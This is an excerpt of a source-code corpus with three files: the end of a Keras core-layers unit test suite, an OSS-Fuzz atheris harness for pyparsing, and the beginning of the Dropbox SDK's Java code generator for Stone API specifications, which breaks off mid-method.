input_shape=(2, 3, 4))
def test_spatial_dropout_2d(self):
testing_utils.layer_test(
keras.layers.SpatialDropout2D,
kwargs={'rate': 0.5},
input_shape=(2, 3, 4, 5))
testing_utils.layer_test(
keras.layers.SpatialDropout2D,
kwargs={'rate': 0.5, 'data_format': 'channels_first'},
input_shape=(2, 3, 4, 5))
def test_spatial_dropout_3d(self):
testing_utils.layer_test(
keras.layers.SpatialDropout3D,
kwargs={'rate': 0.5},
input_shape=(2, 3, 4, 4, 5))
testing_utils.layer_test(
keras.layers.SpatialDropout3D,
kwargs={'rate': 0.5, 'data_format': 'channels_first'},
input_shape=(2, 3, 4, 4, 5))
def test_dropout_partial_noise_shape(self):
inputs = keras.Input(shape=(5, 10))
layer = keras.layers.Dropout(0.5, noise_shape=(None, 1, None))
outputs = layer(inputs)
model = keras.Model(inputs, outputs)
out = model(np.ones((20, 5, 10)), training=True)
out_np = keras.backend.get_value(out)
# Test that dropout mask is shared across second dim.
self.assertAllClose(out_np[:, 0, :], out_np[:, 1, :])
@keras_parameterized.run_all_keras_modes
class LambdaLayerTest(keras_parameterized.TestCase):
def test_lambda(self):
testing_utils.layer_test(
keras.layers.Lambda,
kwargs={'function': lambda x: x + 1},
input_shape=(3, 2))
testing_utils.layer_test(
keras.layers.Lambda,
kwargs={
'function': lambda x, a, b: x * a + b,
'arguments': {
'a': 0.6,
'b': 0.4
}
},
input_shape=(3, 2))
# test serialization with function
def f(x):
return x + 1
ld = keras.layers.Lambda(f)
config = ld.get_config()
ld = keras.layers.deserialize({
'class_name': 'Lambda',
'config': config
})
self.assertEqual(ld.function(3), 4)
# test with lambda
ld = keras.layers.Lambda(
lambda x: keras.backend.concatenate([math_ops.square(x), x]))
config = ld.get_config()
ld = keras.layers.Lambda.from_config(config)
self.assertAllEqual(self.evaluate(ld.function([3])), [9, 3])
def test_lambda_multiple_inputs(self):
ld = keras.layers.Lambda(lambda x: x[0], output_shape=lambda x: x[0])
x1 = np.ones([3, 2], np.float32)
x2 = np.ones([3, 5], np.float32)
out = ld([x1, x2])
self.assertAllEqual(out.shape, [3, 2])
def test_lambda_output_shape(self):
l = keras.layers.Lambda(lambda x: x + 1, output_shape=(1, 1))
l(keras.backend.variable(np.ones((1, 1))))
self.assertEqual((1, 1), l.get_config()['output_shape'])
def test_lambda_output_shape_function(self):
def get_output_shape(input_shape):
return 1 * input_shape
l = keras.layers.Lambda(lambda x: x + 1, output_shape=get_output_shape)
l(keras.backend.variable(np.ones((1, 1))))
self.assertEqual('lambda', l.get_config()['output_shape_type'])
def test_lambda_output_shape_autocalculate_multiple_inputs(self):
def lambda_fn(x):
return math_ops.matmul(x[0], x[1])
l = keras.layers.Lambda(lambda_fn, dtype=dtypes.float64)
output_shape = l.compute_output_shape([(10, 10), (10, 20)])
self.assertAllEqual((10, 20), output_shape)
output_signature = l.compute_output_signature([
tensor_spec.TensorSpec(dtype=dtypes.float64, shape=(10, 10)),
tensor_spec.TensorSpec(dtype=dtypes.float64, shape=(10, 20))])
self.assertAllEqual((10, 20), output_signature.shape)
self.assertAllEqual(dtypes.float64, output_signature.dtype)
def test_lambda_output_shape_list_multiple_outputs(self):
def lambda_fn(x):
return x
l = keras.layers.Lambda(lambda_fn, output_shape=[(10,), (20,)])
output_shape = l.compute_output_shape([(10, 10), (10, 20)])
self.assertAllEqual([(10, 10), (10, 20)], output_shape)
def test_lambda_output_shape_tuple_with_none(self):
def lambda_fn(x):
return x
l = keras.layers.Lambda(lambda_fn, output_shape=(None, 10))
output_shape = l.compute_output_shape((5, 10, 20))
self.assertAllEqual([5, None, 10], output_shape.as_list())
def test_lambda_output_shape_function_multiple_outputs(self):
def lambda_fn(x):
return x
def output_shape_fn(input_shape):
return input_shape
l = keras.layers.Lambda(lambda_fn, output_shape=output_shape_fn)
output_shape = l.compute_output_shape([(10, 10), (10, 20)])
self.assertAllEqual([(10, 10), (10, 20)], output_shape)
def test_lambda_output_shape_nested(self):
def lambda_fn(inputs):
return (inputs[1]['a'], {'b': inputs[0]})
l = keras.layers.Lambda(lambda_fn)
output_shape = l.compute_output_shape(((10, 20), {'a': (10, 5)}))
self.assertAllEqual(((10, 5), {'b': (10, 20)}), output_shape)
def test_lambda_config_serialization(self):
# Test serialization with output_shape and output_shape_type
layer = keras.layers.Lambda(
lambda x: x + 1,
output_shape=(1, 1),
mask=lambda i, m: m)
layer(keras.backend.variable(np.ones((1, 1))))
config = layer.get_config()
layer = keras.layers.deserialize({
'class_name': 'Lambda',
'config': config
})
self.assertAllEqual(layer.function(1), 2)
self.assertAllEqual(layer._output_shape, (1, 1))
self.assertAllEqual(layer.mask(1, True), True)
layer = keras.layers.Lambda.from_config(config)
self.assertAllEqual(layer.function(1), 2)
self.assertAllEqual(layer._output_shape, (1, 1))
self.assertAllEqual(layer.mask(1, True), True)
def test_lambda_with_variable(self):
def fn(x):
return x * variables.Variable(2., name='multiplier')
layer = keras.layers.Lambda(fn)
for _ in range(10):
layer(np.ones((10, 10), 'float32'))
self.assertLen(layer.trainable_weights, 1)
self.assertEqual(layer.trainable_weights[0].name, 'lambda/multiplier:0')
def test_lambda_with_training_arg(self):
def fn(x, training=True):
return keras.backend.in_train_phase(x, 2 * x, training=training)
layer = keras.layers.Lambda(fn)
x = keras.backend.ones(())
train_out = layer(x, training=True)
eval_out = layer(x, training=False)
self.assertEqual(keras.backend.get_value(train_out), 1.)
self.assertEqual(keras.backend.get_value(eval_out), 2.)
def test_lambda_with_mask(self):
def add_one(inputs):
return inputs + 1.0
def mask(unused_inputs, previous_mask):
return previous_mask
layer = keras.layers.Lambda(add_one, mask=mask)
x = np.ones([5, 4, 3])
x[:, -1, :] = 0
masking = keras.layers.Masking()
out = layer(masking(x))
expected_out = np.full([5, 4, 3], 2.0)
expected_out[:, -1, :] = 1.0
expected_mask = np.ones([5, 4])
expected_mask[:, -1] = 0.0
self.assertAllClose(self.evaluate(out), expected_out)
self.assertIsNotNone(out._keras_mask)
self.assertAllClose(self.evaluate(out._keras_mask), expected_mask)
class TestStatefulLambda(keras_parameterized.TestCase):
@keras_parameterized.run_all_keras_modes
@keras_parameterized.run_with_all_model_types
def test_lambda_with_variable_in_model(self):
def lambda_fn(x):
# Variable will only get created once.
v = variables.Variable(1., trainable=True)
return x * v
model = testing_utils.get_model_from_layers(
[keras.layers.Lambda(lambda_fn)], input_shape=(10,))
model.compile(
keras.optimizer_v2.gradient_descent.SGD(0.1),
'mae',
run_eagerly=testing_utils.should_run_eagerly(),
experimental_run_tf_function=testing_utils.should_run_tf_function())
x, y = np.ones((10, 10), 'float32'), 2 * np.ones((10, 10), 'float32')
model.fit(x, y, batch_size=2, epochs=2, validation_data=(x, y))
self.assertLen(model.trainable_weights, 1)
self.assertAllClose(keras.backend.get_value(model.trainable_weights[0]), 2.)
@keras_parameterized.run_all_keras_modes
class CoreLayersTest(keras_parameterized.TestCase):
def test_masking(self):
testing_utils.layer_test(
keras.layers.Masking, kwargs={}, input_shape=(3, 2, 3))
def test_keras_mask(self):
x = np.ones((10, 10))
y = keras.layers.Masking(1.)(x)
self.assertTrue(hasattr(y, '_keras_mask'))
self.assertTrue(y._keras_mask is not None)
self.assertAllClose(self.evaluate(y._keras_mask), np.zeros((10,)))
def test_compute_mask_with_positional_mask_arg(self):
class MyLayer(keras.layers.Layer):
def call(self, inputs, mask=None):
return inputs
def compute_mask(self, inputs, mask=None):
if mask is not None:
return array_ops.ones(())
else:
return array_ops.zeros(())
x, mask = array_ops.ones((1, 1)), array_ops.ones((1, 1))
layer = MyLayer()
y = layer(x, mask)
# Check that `mask` was correctly sent to `compute_mask`.
self.assertEqual(keras.backend.get_value(y._keras_mask), 1)
def test_activation(self):
# with string argument
testing_utils.layer_test(
keras.layers.Activation,
kwargs={'activation': 'relu'},
input_shape=(3, 2))
# with function argument
testing_utils.layer_test(
keras.layers.Activation,
kwargs={'activation': keras.backend.relu},
input_shape=(3, 2))
def test_reshape(self):
testing_utils.layer_test(
keras.layers.Reshape,
kwargs={'target_shape': (8, 1)},
input_shape=(3, 2, 4))
testing_utils.layer_test(
keras.layers.Reshape,
kwargs={'target_shape': (-1, 1)},
input_shape=(3, 2, 4))
testing_utils.layer_test(
keras.layers.Reshape,
kwargs={'target_shape': (1, -1)},
input_shape=(3, 2, 4))
testing_utils.layer_test(
keras.layers.Reshape,
kwargs={'target_shape': (-1, 1)},
input_shape=(None, None, 2))
def test_permute(self):
testing_utils.layer_test(
keras.layers.Permute, kwargs={'dims': (2, 1)}, input_shape=(3, 2, 4))
def test_permute_errors_on_invalid_starting_dims_index(self):
with self.assertRaisesRegexp(ValueError, r'Invalid permutation .*dims.*'):
testing_utils.layer_test(
keras.layers.Permute,
kwargs={'dims': (0, 1, 2)}, input_shape=(3, 2, 4))
def test_permute_errors_on_invalid_set_of_dims_indices(self):
with self.assertRaisesRegexp(ValueError, r'Invalid permutation .*dims.*'):
testing_utils.layer_test(
keras.layers.Permute,
kwargs={'dims': (1, 4, 2)}, input_shape=(3, 2, 4))
def test_flatten(self):
testing_utils.layer_test(
keras.layers.Flatten, kwargs={}, input_shape=(3, 2, 4))
# Test channels_first
inputs = np.random.random((10, 3, 5, 5)).astype('float32')
outputs = testing_utils.layer_test(
keras.layers.Flatten,
kwargs={'data_format': 'channels_first'},
input_data=inputs)
target_outputs = np.reshape(
np.transpose(inputs, (0, 2, 3, 1)), (-1, 5 * 5 * 3))
self.assertAllClose(outputs, target_outputs)
def test_flatten_scalar_channels(self):
testing_utils.layer_test(
keras.layers.Flatten, kwargs={}, input_shape=(3,))
# Test channels_first
inputs = np.random.random((10,)).astype('float32')
outputs = testing_utils.layer_test(
keras.layers.Flatten,
kwargs={'data_format': 'channels_first'},
input_data=inputs)
target_outputs = np.expand_dims(inputs, -1)
self.assertAllClose(outputs, target_outputs)
def test_repeat_vector(self):
testing_utils.layer_test(
keras.layers.RepeatVector, kwargs={'n': 3}, input_shape=(3, 2))
def test_dense(self):
testing_utils.layer_test(
keras.layers.Dense, kwargs={'units': 3}, input_shape=(3, 2))
testing_utils.layer_test(
keras.layers.Dense, kwargs={'units': 3}, input_shape=(3, 4, 2))
testing_utils.layer_test(
keras.layers.Dense, kwargs={'units': 3}, input_shape=(None, None, 2))
testing_utils.layer_test(
keras.layers.Dense, kwargs={'units': 3}, input_shape=(3, 4, 5, 2))
def test_dense_dtype(self):
inputs = ops.convert_to_tensor(
np.random.randint(low=0, high=7, size=(2, 2)))
layer = keras.layers.Dense(5, dtype='float32')
outputs = layer(inputs)
self.assertEqual(outputs.dtype, 'float32')
def test_dense_with_policy(self):
inputs = ops.convert_to_tensor(
np.random.randint(low=0, high=7, size=(2, 2)), dtype='float16')
layer = keras.layers.Dense(5, dtype=policy.Policy('infer_float32_vars'))
outputs = layer(inputs)
output_signature = layer.compute_output_signature(
tensor_spec.TensorSpec(dtype='float16', shape=(2, 2)))
self.assertEqual(output_signature.dtype, dtypes.float16)
self.assertEqual(output_signature.shape, (2, 5))
self.assertEqual(outputs.dtype, 'float16')
self.assertEqual(layer.kernel.dtype, 'float32')
def test_dense_regularization(self):
layer = keras.layers.Dense(
3,
kernel_regularizer=keras.regularizers.l1(0.01),
bias_regularizer='l1',
activity_regularizer='l2',
name='dense_reg')
layer(keras.backend.variable(np.ones((2, 4))))
self.assertEqual(3, len(layer.losses))
def test_dense_constraints(self):
k_constraint = keras.constraints.max_norm(0.01)
b_constraint = keras.constraints.max_norm(0.01)
layer = keras.layers.Dense(
3, kernel_constraint=k_constraint, bias_constraint=b_constraint)
layer(keras.backend.variable(np.ones((2, 4))))
self.assertEqual(layer.kernel.constraint, k_constraint)
self.assertEqual(layer.bias.constraint, b_constraint)
def test_activity_regularization(self):
layer = keras.layers.ActivityRegularization(l1=0.1)
layer(keras.backend.variable(np.ones((2, 4))))
self.assertEqual(1, len(layer.losses))
config = layer.get_config()
self.assertEqual(config.pop('l1'), 0.1)
def test_numpy_inputs(self):
if context.executing_eagerly():
layer = keras.layers.RepeatVector(2)
x = np.ones((10, 10))
self.assertAllEqual(np.ones((10, 2, 10)), layer(x))
layer = keras.layers.Concatenate()
x, y = np.ones((10, 10)), np.ones((10, 10))
self.assertAllEqual(np.ones((10, 20)), layer([x, y]))
if __name__ == '__main__':
test.main()
|
1a7be8600f3883cbfb5984eea6702bbfc87c740f
|
38fff7bdefd8d62a740d51329b50d0e1e49258bb
|
/projects/pyparsing/fuzz_parse.py
|
885056300a4d64992726aa9fcee9cb618b71b2b2
|
[
"Apache-2.0"
] |
permissive
|
google/oss-fuzz
|
026384c2ada61ef68b147548e830f60730c5e738
|
f0275421f84b8f80ee767fb9230134ac97cb687b
|
refs/heads/master
| 2023-08-31T23:30:28.157702
| 2023-08-31T21:49:30
| 2023-08-31T21:49:30
| 63,809,205
| 9,438
| 2,315
|
Apache-2.0
| 2023-09-14T20:32:19
| 2016-07-20T19:39:50
|
Shell
|
UTF-8
|
Python
| false
| false
| 2,669
|
py
|
fuzz_parse.py
|
#!/usr/bin/python3
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import sys
import atheris
from pyparsing import (
Literal,
Word,
ZeroOrMore,
Group,
Dict,
Suppress,
ParseException,
)
def dict_parse_generator(fdp):
"""Generate random parser"""
curr = Literal("f")
special_chars="[]{}/|\<>:;-="
op_count = fdp.ConsumeIntInRange(2, 15)
for i in range(op_count):
operation = fdp.ConsumeIntInRange(0,4)
if operation == 0:
l1 = Literal(fdp.PickValueInList(list(special_chars)))
l2 = Literal(fdp.PickValueInList(list(special_chars)))
word = Word(fdp.ConsumeUnicodeNoSurrogates(10))
curr = Group(Dict(ZeroOrMore(word)) + curr)
elif operation == 1:
word1 = Word(fdp.ConsumeUnicodeNoSurrogates(10))
word2 = Word(fdp.ConsumeUnicodeNoSurrogates(10))
curr = Group(Dict(OneOrMore(word1, word2)) + curr)
elif operation == 2:
curr = curr + Word(fdp.ConsumeUnicodeNoSurrogates(10))
elif operation == 3:
curr = curr + Suppress(fdp.ConsumeUnicodeNoSurrogates(2))
else:
word1 = Word(fdp.ConsumeUnicodeNoSurrogates(10))
word2 = Word(fdp.ConsumeUnicodeNoSurrogates(10))
curr = Group(Dict(OneOrMore(word1, word2)) + curr)
return Dict(curr)
def TestOneInput(data):
fdp = atheris.FuzzedDataProvider(data)
try:
bnf = dict_parse_generator(fdp)
except:
return
try:
tokens = bnf.parseString(fdp.ConsumeUnicodeNoSurrogates(1024))
except ParseException:
pass
except TypeError as e:
# Catch the TypeError exception from here:
# https://github.com/pyparsing/pyparsing/blob/d93930308f7fe79f2290812074f62a472c83db59/pyparsing/core.py#L5674
if "could not extract dict values from parsed results" in str(e):
pass
else:
raise e
def main():
atheris.instrument_all()
atheris.Setup(sys.argv, TestOneInput, enable_python_coverage=True)
atheris.Fuzz()
if __name__ == "__main__":
main()
|
6b212efd8b84093890683337f55b97806204c5c1
|
6bf300763e699d53e1588925e56dac1ef872b67c
|
/core/generator/java/java.stoneg.py
|
bd575d25505b3cd82883f6a99296f0bcbe619547
|
[
"MIT"
] |
permissive
|
dropbox/dropbox-sdk-java
|
c7a51c43ea2813579a18a41e47e09b7097f9827e
|
d96bbd5c28b1d2398957931e0ca1e3568b2df41d
|
refs/heads/main
| 2023-08-25T08:58:08.939105
| 2023-08-10T21:31:40
| 2023-08-10T21:31:40
| 10,983,050
| 621
| 581
|
MIT
| 2023-08-10T21:31:41
| 2013-06-27T00:32:18
|
Java
|
UTF-8
|
Python
| false
| false
| 180,888
|
py
|
java.stoneg.py
|
import abc
import argparse
import json
import os
import re
import sys
import types
from collections import defaultdict, OrderedDict
if sys.version_info >= (3, 10):
from collections.abc import Sequence
else:
from collections import Sequence
from contextlib import contextmanager
from functools import (
total_ordering,
wraps,
)
from itertools import chain
from stone.ir import (
ApiNamespace,
ApiRoute,
DataType,
Field,
Int32,
is_boolean_type,
is_bytes_type,
is_composite_type,
is_list_type,
is_map_type,
is_nullable_type,
is_numeric_type,
is_string_type,
is_struct_type,
is_timestamp_type,
is_union_type,
is_user_defined_type,
is_void_type,
StructField,
TagRef,
UnionField,
unwrap_nullable,
)
from stone.backend import CodeBackend
from stone.frontend.ir_generator import parse_data_types_from_doc_ref
class StoneType(metaclass=abc.ABCMeta):
pass
StoneType.register(ApiNamespace)
StoneType.register(ApiRoute)
StoneType.register(DataType)
StoneType.register(Field)
def cached(f):
cache = {}
@wraps(f)
def wrapper(*args, **kwargs):
key = tuple(args) + tuple(entry for entry in sorted(kwargs.items()))
if key in cache:
return cache[key]
else:
val = f(*args, **kwargs)
cache[key] = val
return val
return wrapper
class cached_property:
"""
Decorator similar to @property, but which caches the results permanently.
"""
def __init__(self, func):
self._func = func
self._attr_name = func.__name__
def __get__(self, instance, owner):
if instance is None:
return self
else:
val = self._func(instance)
instance.__dict__[self._attr_name] = val
return val
def _fixreserved(s):
if s in _RESERVED_KEYWORDS:
s += '_'
return s
def _capwords(s):
words = s.replace('/', '_').split('_')
return ''.join(w[:1].upper() + w[1:] for w in words)
def _camelcase(s):
s = _capwords(s)
return s[:1].lower() + s[1:]
def _allcaps(s):
return s.replace('/', '_').upper()
def capwords(s):
return _fixreserved(_capwords(s))
def camelcase(s):
return _fixreserved(_camelcase(s))
def allcaps(s):
return _fixreserved(_allcaps(s))
def collapse_whitespace(s):
return "\n".join(
line.strip() for line in s.strip().splitlines()
)
def split_paragraphs(s):
paragraph = []
for line in s.splitlines():
line = line.strip()
if line == '':
if paragraph:
yield "\n".join(paragraph)
del paragraph[:]
else:
paragraph.append(line)
if paragraph:
yield "\n".join(paragraph)
def split_stone_name(stone_fq_name, max_parts):
assert isinstance(stone_fq_name, str), repr(stone_fq_name)
assert max_parts > 0, "max_parts must be positive"
parts = stone_fq_name.split('.')
if len(parts) > max_parts:
raise ValueError('Malformed Stone reference: %s' % stone_fq_name)
else:
filler = (None,) * (max_parts - len(parts))
return filler + tuple(parts)
def sanitize_pattern(pattern):
return pattern.replace('\\', '\\\\').replace('"', '\\"')
_JAVADOC_REPLACEMENT_CHARS = (
('&', '&'),
('<', '<'),
('>', '>'),
)
def sanitize_javadoc(doc):
# sanitize &, <, > characters
for char, code in _JAVADOC_REPLACEMENT_CHARS:
doc = doc.replace(char, code)
return doc
def unsanitize_javadoc(doc):
for char, code in _JAVADOC_REPLACEMENT_CHARS:
doc = doc.replace(code, char)
return doc
def oxford_comma_list(values, conjunction='and'):
if not values:
return None
elif len(values) == 1:
return values[0]
elif len(values) == 2:
return '{} {} {}'.format(values[0], conjunction, values[1])
else:
return '{}, {} {}'.format(', '.join(values[:-1]), conjunction, values[-1])
def classname(s):
return capwords(s)
def get_ancestors(data_type):
"""Return list of (tag, data_type) pairs.
The first pair is the root and always has tag None.
The last pair represents the argument.
The tag is only present if the data_type in that pair has an
ancestor and is a member of that ancestore's enumerated subtypes.
Suppose we have the following tree:
struct A
struct B extends A
struct C extends B
Without enumerated subtypes:
- get_ancestors(C) returns [(None, A), (None, B), (None, C)]
- get_ancestors(B) returns [(None, A), (None, B)]
- get_ancestors(A) returns [(None, A)]
Now add enumerated subtypes, so the tree becomes:
struct A
union
b B
struct B extends A
union
c C
struct C extends B
Now the return values are:
- get_ancestors(C) returns [(None, A), ('b', B), ('c', C)]
- get_ancestors(B) returns [(None, A), ('b', B)]
- get_ancestors(A) returns [(None, A)]
"""
assert isinstance(data_type, DataType), repr(data_type)
ancestors = []
while data_type is not None:
parent_type = data_type.parent_type
tag = None
if parent_type is not None and parent_type.has_enumerated_subtypes():
for field in parent_type.get_enumerated_subtypes():
if field.data_type is data_type:
tag = field.name
break
else:
assert False, "Type {} not found in subtypes of ancestor {}".format(data_type.name,
parent_type.name)
ancestors.append((tag, data_type))
data_type = parent_type
ancestors.reverse()
return ancestors
def get_enumerated_subtypes_recursively(data_type):
"""
Returns a list of (tag, DataType) pairs.
This method searches for all possible enumerated subtypes of the given data type. In the
example:
struct A
union
b B
c C
struct B extends A
union
d D
e E
struct C extends A
union
f F
struct D extends B
struct E extends B
struct F extends C
The following value would be returned:
- get_enumerated_subtypes_recursively(A): [('b', B), ('c', C), ('b.d', D), ('b.e', E), ('c.f', F)]
- get_enumerated_subtypes_recursively(B): [('b.d', D), ('b.e', E)]
- get_enumerated_subtypes_recursively(C): [('c.f', F)]
- get_enumerated_subtypes_recursively(D): []
"""
assert isinstance(data_type, DataType), repr(data_type)
if not data_type.has_enumerated_subtypes():
return []
subtypes = []
def add_subtype(data_type):
subtypes.append(data_type)
if data_type.has_enumerated_subtypes():
for subtype in data_type.get_enumerated_subtypes():
add_subtype(subtype.data_type)
add_subtype(data_type)
result = []
for subtype in subtypes:
tag = '.'.join(name for name, _ in get_ancestors(subtype) if name)
result.append((tag, subtype))
return result
def get_underlying_type(data_type, allow_data_structures=True):
assert isinstance(data_type, DataType), repr(data_type)
while True:
if allow_data_structures and is_list_type(data_type):
data_type = data_type.data_type
elif allow_data_structures and is_map_type(data_type):
data_type = data_type.value_data_type
elif is_nullable_type(data_type):
data_type = data_type.data_type
else:
break
return data_type
def union_create_with_method_name(data_type, value_fields_subset):
if len(value_fields_subset) > 0:
method_suffix = 'And%s' % _capwords(value_fields_subset[0].name)
else:
method_suffix = ''
return 'withTag%s' % method_suffix
def format_func_name(route):
return '{}_v{}'.format(route.name, route.version) if route.version > 1 else route.name
@total_ordering
class JavaClass:
"""
Represents a Java class name.
This class is a convenience for handling Java classes. This class lets you reference a Java
class explicitly by its fully-qualified name or its short-name.
:ivar str fq_name: Fully-qualified Java class name
"""
def __init__(self, fq_name, generics=()):
assert isinstance(fq_name, str), repr(fq_name)
assert isinstance(generics, Sequence), repr(generics)
# Find/Replace ".Tag" with ".TagObject" due to name conflict WEBSERVDB-18031
if fq_name.endswith(".Tag"):
fq_name = fq_name.replace(".Tag", ".TagObject")
self._fq_name = fq_name
self._generics = generics
for g in generics:
assert isinstance(g, (JavaClass, str)), repr(generics)
if isinstance(g, str):
assert '.' not in g, repr(generics)
package_parts = fq_name.split('.')
# Handle nested classes, like:
#
# com.foo.Bar.Wop
#
# name => Wop
# package => com.foo
# static_name => Bar.Wop
# import_name => com.foo.Bar
#
self._name = package_parts[-1]
for i, part in enumerate(package_parts):
is_last = i == len(package_parts) - 1
is_class_name = (part and part[0].isupper())
if is_last or is_class_name:
self._package = '.'.join(package_parts[:i])
self._static_name = '.'.join(package_parts[i:])
self._import_name = '.'.join(package_parts[:i + 1])
break
@classmethod
def from_str(cls, val):
"""
Returns an instance of JavaClass from its string representation produced using str(..).
"""
matcher = re.match(r'^(?P<fq_name>[^< ]+)(?:<(?P<generics>.*)>)?$', val)
if matcher is None:
raise ValueError("Malformed Java class: %s" % val)
fq_name = matcher.group('fq_name')
generics_group = matcher.group('generics')
generics = []
if generics_group is not None:
for gtype in generics_group.split(','):
gtype = gtype.strip()
if not gtype:
raise ValueError("Malformed Java class: %s" % val)
if '.' in gtype:
generics.append(cls.from_str(gtype))
else:
generics.append(gtype)
return JavaClass(fq_name, generics=generics)
@property
def fq(self):
"""
Fully-qualified Java class name.
Example: com.foo.Bar.Wop => com.foo.Bar.Wop
:rtype: str
"""
return self._fq_name
@property
def name(self):
"""
Short name of Java class.
Example: com.foo.Bar.Wop => Wop
:rtype: str
"""
return self._name
@property
def name_with_generics(self):
if self._generics and all('.' in g for g in self._generics):
return '{}<{}>'.format(self._name, ', '.join(self._generics))
else:
return self._name
def resolved_name(self, current_class, imports, generics=False):
"""
Returns the appropriate name to use when referencing this class from within the given class.
Examples:
current_class => JavaClass("com.dropbox.files.C")
imports => {JavaClass("com.dropbox.common.A"), JavaClass("java.util.B")}
"com.dropbox.files.D" => "D" # package local
"com.dropbox.common.E" => "com.dropbox.common.E" # not imported
"com.dropbox.common.A" => "A" # already imported
"com.dropbox.files.C.X" => "X" # nested inner class
"java.util.B.Y" => "B.Y" # nested class outside current class
Args:
current_class(JavaClass): class that will reference this class
imports(set[JavaClass]): set of full-qualified classes that have been imported
:rtype: str
"""
resolved = self._resolved_name(current_class, imports)
if generics and self._generics:
resolved_generics = ', '.join(
g.resolved_name(current_class, imports, generics) if isinstance(g, JavaClass) else g
for g in self._generics
)
return '{}<{}>'.format(resolved, resolved_generics)
else:
return resolved
def _resolved_name(self, current_class, imports):
# no package, so just return the name
if not self._package:
return self._name
assert isinstance(current_class, JavaClass), repr(current_class)
assert imports is not None
# inner class? (e.g. com.foo.CommitInfo.Builder)
if self._fq_name.startswith(current_class._fq_name + '.'):
return self._fq_name[len(current_class._fq_name) + 1:]
# package-local class? we don't need to import these
if self._package == current_class.package:
return self._static_name
# check if we already imported this name into our current context
if self.import_class in imports:
return self._static_name
# last resort, display fully-qualified name
return self._fq_name
@property
def package(self):
"""
Name of package containing this Java class.
Example: com.foo.Bar.Wop => com.foo
:rtype: str
"""
return self._package
@property
def is_nested(self):
"""
Whether or not this class is nested within another Java class.
:rtype: bool
"""
return self._static_name != self._name
@property
def import_class(self):
"""
Returns the root class containing this nested class. Example:
com.foo.Bar => com.foo.Bar
com.foo.Bar.A => com.foo.Bar
com.foo.Bar.A.B => com.foo.Bar
The returned class is the class you would import if you needed access to this class.
:rtype: JavaClass
"""
return JavaClass(self._import_name)
def __repr__(self):
return '{}({})'.format(type(self), str(self))
def __str__(self):
if self._generics:
return '{}<{}>'.format(self._fq_name, ', '.join(str(g) for g in self._generics))
else:
return self._fq_name
def __hash__(self):
return hash(self._fq_name)
def __ne__(self, other):
return not self.__eq__(other)
def __eq__(self, other):
if isinstance(other, JavaClass):
return self._fq_name == other._fq_name
return False
def __lt__(self, other):
assert isinstance(other, type(self)), repr(other)
return self._fq_name < other._fq_name
@total_ordering
class Visibility:
def __init__(self, rank, name, modifier):
self._rank = rank
self._name = name
self._modifier = modifier
@property
def name(self):
return self._name
@property
def is_visible(self):
return self._modifier is not None
@property
def modifier(self):
if not self.is_visible:
raise ValueError("Not visible")
return self._modifier
@classmethod
def from_name(cls, name):
for value in cls._VALUES:
if value.name == name:
return value
raise ValueError("Unrecognized name: %s" % name)
def __repr__(self):
return self._name
def __hash__(self):
return self._rank
def __ne__(self, other):
return not self.__eq__(other)
def __eq__(self, other):
if isinstance(other, type(self)):
return self._rank == other._rank
return False
def __lt__(self, other):
assert isinstance(other, type(self)), repr(other)
return self._rank < other._rank
Visibility.NONE = Visibility(0, 'NONE', None)
Visibility.PRIVATE = Visibility(1, 'PRIVATE', 'private')
Visibility.PACKAGE = Visibility(2, 'PACKAGE', '')
Visibility.PUBLIC = Visibility(3, 'PUBLIC', 'public')
Visibility._VALUES = (Visibility.NONE, Visibility.PRIVATE, Visibility.PACKAGE, Visibility.PUBLIC)
_CMDLINE_PARSER = argparse.ArgumentParser(prog='java-generator')
_CMDLINE_PARSER.add_argument('--package', type=str, required=True,
help='base package name')
_CMDLINE_PARSER.add_argument('--client-class', type=str, default='StoneClient',
help='Name of client class to generate.')
_CMDLINE_PARSER.add_argument('--client-javadoc', type=str,
default='Auto-generated Stone client',
help='Class Javadoc to use for auto-generated client.')
_CMDLINE_PARSER.add_argument('--requests-classname-prefix', type=str, default=None,
help=('Prefix to prepend to the per-namespace requests classes. '
'Defaults to using the name of the client class.'))
_CMDLINE_PARSER.add_argument('--data-types-only', action="store_true", default=False,
help='Generate all data types but no routes or clients.')
_CMDLINE_PARSER.add_argument('--javadoc-refs', type=str, default=None,
help='Path to Javadoc references file. If a file exists at this ' +
'path, it will be loaded and used for generating correct Javadoc ' +
'references based off previous generator runs. This is useful when ' +
'generating multiple clients for a single project. ' +
'If this argument is specified, an update Javadoc references file ' +
'will be saved to the given location. It is OK if this file does not ' +
'exist.')
_CMDLINE_PARSER.add_argument('--unused-classes-to-generate', default=None, help='Specify types ' +
'that we want to generate regardless of whether they are used.')
class JavaCodeGenerator(CodeBackend):
cmdline_parser = _CMDLINE_PARSER
def generate(self, api):
"""
Toplevel code generation method.
This is called by stone.cli.
"""
generator = JavaCodeGenerationInstance(self, api)
if self.args.data_types_only:
assert self.args.javadoc_refs is None, "Cannot specify --javadoc-refs with --data-types-only"
generator.generate_data_types()
else:
generator.generate_all()
class JavaImporter:
def __init__(self, current_class, j):
assert isinstance(current_class, JavaClass), repr(current_class)
assert isinstance(j, JavaApi), repr(j)
self._class = current_class
self._j = j
self._imports = set()
@property
def imports(self):
return frozenset(self._imports)
def add_imports(self, *imports):
"""
Adds the fully-qualified Java class names to the set of imports for the currently generated
class.
Imports must be fully-qualified class name strings (e.g. ``"com.foo.Bar"``) or JavaClass
instances.
"""
assert all(isinstance(i, (str, JavaClass)) for i in imports), repr(imports)
def convert(val):
if isinstance(val, JavaClass):
return val
elif isinstance(val, str):
return JavaClass(val)
else:
raise AssertionError(repr(type(val)))
# convert all imports to JavaClass instances
imports = [convert(i) for i in imports]
# remove imports that are missing package (e.g. long, Integer,
# etc) and imports from java.lang
imports = [
i for i in imports
if i.package and i.package != 'java.lang'
]
current_class_prefix = self._class.fq + '.'
existing_names = {i.name: i for i in self._imports}
# avoid issues where we import a class with the same name as us
existing_names[self._class.name] = self._class
for import_ in imports:
# resolve nested classes to their root containing class
import_ = import_.import_class
# already imported or local name (not fully qualified)
if import_ in self._imports or not import_.package:
continue
# ignore nested classes inside our current class
if import_ == self._class:
continue
# is this import in our existing names? make sure we choose the most "valid" import
# between the two:
if import_.name in existing_names:
